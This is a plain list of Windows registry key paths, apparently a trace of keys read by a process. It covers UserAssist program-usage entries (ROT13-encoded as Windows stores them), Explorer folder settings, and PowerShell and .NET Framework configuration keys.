HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Jvaqbjf Wbheany\Wbheany.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pbzrkc.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NOQ94SO-R7Q6-84N6-N997-P918RQQR0NR5}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bqopnq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OO044OSQ-25O7-2SNN-22N8-6371N93R0456}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\vfpfvpcy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ZqFpurq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{8NN47365-O2O3-1961-69RO-S866R376O12S}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\cevagznantrzrag.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{OQ3S924R-55SO-N1ON-9QR6-O50S9S2460NP}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JS.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{15067OP1-P5N8-425R-37P6-SN0O891674S9}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\erpqvfp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfen.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxBssvprQvtvgnyFSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\ZFGBER.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxFrgYnathntrSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\\x01ko'OIs!!!!!!!!!ZXXFxJkcSvyrf<
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Zvpebfbsg Bssvpr\Bssvpr14\BVF.RKR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Pbzzba Svyrf\zvpebfbsg funerq\BSSVPR14\Bssvpr Frghc Pbagebyyre\cebzb.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{53123611-QN37-S8QN-SNP9-03R76QO9Q64Q}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Clguba27\clguba.rkr
HKEY_CLASSES_ROOT\Applications\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_JumpListItems
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsHistory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\PowerShellVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\RuntimeVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ConsoleHostAssemblyName
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\index169\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\181938c6\7950e2c5\82\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7950e2c5\19b8f67f\82\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\13b06edc\3d40437\3b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5569937f\21247651\3e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\73843e06\43a920ef\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\19ab8d57\1bd7b0d8\8f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d40437\3f3fc448\3b\LastModTime
